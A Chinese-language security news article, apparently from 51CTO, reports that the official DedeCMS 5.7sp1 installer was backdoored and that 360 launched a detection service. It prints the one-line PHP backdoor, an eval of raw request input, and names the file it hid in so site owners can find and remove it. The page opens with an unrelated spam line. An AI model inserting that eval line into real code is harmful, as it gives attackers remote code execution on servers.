自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

DedeCMS官方版本驚曝后門 360緊急推出安全檢測

安全
日前,織夢內(nèi)容管理系統(tǒng)(DedeCMS)遭烏云漏洞平臺曝光稱,DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測平臺檢測,該后門確實曾一度出現(xiàn)在織夢官網(wǎng)版本中。為此,360于當(dāng)天緊急推出DedeCMS后門檢測服務(wù),并已對大批中招網(wǎng)站發(fā)出郵件報警。

日前,織夢內(nèi)容管理系統(tǒng)(DedeCMS)遭烏云漏洞平臺曝光稱,DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測平臺檢測,該后門確實曾一度出現(xiàn)在織夢官網(wǎng)版本中。為此,360于當(dāng)天緊急推出DedeCMS后門檢測服務(wù),并已對大批中招網(wǎng)站發(fā)出郵件報警。

圖1:DedeCms被植入的后門代碼

據(jù)悉,DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個人網(wǎng)站上,是國內(nèi)用戶量最大的PHP類CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn),此次DedeCMS曝出的后門名為"一句話后門",其惡意代碼存在于DedeCMS購物車類文件中,凡是調(diào)用該購物車類的文件均會觸發(fā)后門,從而導(dǎo)致整個網(wǎng)站甚至服務(wù)器遭黑客進一步控制。

360建議,使用DedeCMS的網(wǎng)站站長應(yīng)立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));",如存在應(yīng)刪除該行代碼,如不存在則證明沒有該"一句話后門"。

作為開源軟件,DedeCMS此次曝出后門并非個例。因為在國際上,Linux等多款著名的開源軟件也曾遭黑客植入后門。不過,烏云漏洞平臺公開的織夢官方郵件顯示,織夢開發(fā)團隊否認(rèn)了產(chǎn)品曾被植入后門,但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進行了修改。

圖2:測試驗證PHP代碼可被DedeCMS后門執(zhí)行

 

責(zé)任編輯:守望幸福 來源: 51CTO.com
相關(guān)推薦

2015-12-25 16:49:52

2023-07-31 09:36:07

Linux官方版本

2013-01-14 12:15:51

2014-08-27 18:09:05

2011-01-07 09:47:21

Windows 8

2011-06-16 08:51:54

2011-08-15 15:41:29

2014-05-04 12:58:10

安全漏洞修復(fù)補丁

2024-04-03 14:28:12

2023-08-14 19:51:43

2018-01-05 08:53:32

LinuxUbuntu發(fā)行版

2016-01-13 10:33:48

飛塔防火墻SSH后門

2013-03-11 17:31:48

華為Emotion UI手機終端

2010-08-19 16:54:25

iPhone360安全產(chǎn)品

2016-02-22 12:52:51

2013-11-27 09:25:20

2009-04-08 10:55:19

2023-05-26 09:19:46

OpenAIChatGPT

2023-06-01 19:06:00

2020-07-08 16:49:57

騰訊云數(shù)據(jù)庫MySQL
點贊
收藏

51CTO技術(shù)棧公眾號